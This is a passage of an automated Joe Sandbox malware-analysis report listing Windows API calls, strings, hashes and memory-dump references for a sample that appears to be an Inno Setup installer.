                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocHandleLockUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 2167344118-0
                                                                                            • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                            • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                            • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                            • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
                                                                                            • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$EnableItemSystem
                                                                                            • String ID: CurPageChanged
                                                                                            • API String ID: 3692539535-2490978513
                                                                                            • Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                            • Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
                                                                                            • Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                            • Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075
                                                                                            Strings
                                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
                                                                                            • Failed to parse "reg" constant, xrefs: 0047907C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                            • API String ID: 3535843008-1938159461
                                                                                            • Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                            • Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
                                                                                            • Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                            • Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
                                                                                            • SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981
                                                                                            Strings
                                                                                            • Will not restart Windows automatically., xrefs: 00481AA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveForeground
                                                                                            • String ID: Will not restart Windows automatically.
                                                                                            • API String ID: 307657957-4169339592
                                                                                            • Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                            • Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
                                                                                            • Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                            • Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(?), ref: 00424975
                                                                                            • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorMessageWait
                                                                                            • String ID: +qI
                                                                                            • API String ID: 4021538199-4068327824
                                                                                            • Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                            • Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
                                                                                            • Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                            • Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
                                                                                            Strings
                                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
                                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046BD57
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                            • API String ID: 0-1974262853
                                                                                            • Opcode ID: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                                            • Instruction ID: 41ea3916521a7a624eafe14c23fd6f628d308964d0d2c815b7cc35631b26c174
                                                                                            • Opcode Fuzzy Hash: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                                            • Instruction Fuzzy Hash: 6D31CE306042049FD711EB69EA85B9977E4EB15304F1440BFF804DB3A2EB386E80CB8A
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F
                                                                                            Strings
                                                                                            • %s\%s_is1, xrefs: 004779B8
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1598650737
                                                                                            • Opcode ID: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                                            • Instruction ID: 9c5288f04ac2681b3320032c051d60ba9bbc132f2e03367f89e393ba1652dadd
                                                                                            • Opcode Fuzzy Hash: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                                            • Instruction Fuzzy Hash: 49216174B042046FEB01DBA9CC51A9EBBE8EB89704F90847AE504E7381D6789A058B58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMessageSendShell
                                                                                            • String ID: open
                                                                                            • API String ID: 812272486-2758837156
                                                                                            • Opcode ID: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                                            • Instruction ID: 219036bbd933cc3ca485a607602a83352c0bb437124d4d28150632e42eb7a986
                                                                                            • Opcode Fuzzy Hash: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                                            • Instruction Fuzzy Hash: DD213071E00204AFEB00DFA9C881B9EB7F9EB84704F60857AB405F7291D778EA45CB58
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                            • String ID: )
                                                                                            • API String ID: 2227675388-1084416617
                                                                                            • Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                                            • Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
                                                                                            • Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                                            • Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window
                                                                                            • String ID: /INITPROCWND=$%x $@
                                                                                            • API String ID: 2353593579-4169826103
                                                                                            • Opcode ID: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                                            • Instruction ID: dd767cc37dfd13d2cdbde0042d97f8edd346c26068944a47342b43ccbe763047
                                                                                            • Opcode Fuzzy Hash: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                                            • Instruction Fuzzy Hash: 8C11D531A042498FDF01DBA5E851BAEBBE8EB49308F20447BE504E7282D73D99058B98
                                                                                            APIs
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • SysFreeString.OLEAUT32(?), ref: 00446D1A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                                            • API String ID: 3952431833-1023667238
                                                                                            • Opcode ID: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                                            • Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
                                                                                            • Opcode Fuzzy Hash: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                                            • Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
                                                                                            • CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881
                                                                                              • Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                                            • String ID: D
                                                                                            • API String ID: 3798668922-2746444292
                                                                                            • Opcode ID: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                                            • Instruction ID: 06a552fcbca6defc8fdbe432d7558d6d49acb7d91bb7665b8ba999baae494250
                                                                                            • Opcode Fuzzy Hash: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                                            • Instruction Fuzzy Hash: D4015EB5604688AFDF14EBE1CC42E9EBBACDF88714F51007AF504E72D1D6789E068628
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$EnumQuery
                                                                                            • String ID: Inno Setup: No Icons
                                                                                            • API String ID: 1576479698-2016326496
                                                                                            • Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                                            • Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
                                                                                            • Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                                            • Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E
                                                                                            APIs
                                                                                              • Part of subcall function 0047BB30: FreeLibrary.KERNEL32(74600000,0047FFE2), ref: 0047BB46
                                                                                              • Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C
                                                                                              • Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB
                                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523
                                                                                            Strings
                                                                                            • Detected restart. Removing temporary directory., xrefs: 004964D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                                            • API String ID: 1717587489-3199836293
                                                                                            • Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                                            • Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
                                                                                            • Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                                            • Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD
                                                                                            APIs
                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                            • ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteFileHandleMutexRelease
                                                                                            • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                                            • API String ID: 3841931355-3392794427
                                                                                            • Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                                            • Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
                                                                                            • Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                                            • Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C
                                                                                            APIs
                                                                                            • SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
                                                                                            • GetFocus.USER32 ref: 00421D69
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Focus
                                                                                            • String ID: +qI
                                                                                            • API String ID: 2734777837-4068327824
                                                                                            • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                            • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                                            • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                            • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                                            APIs
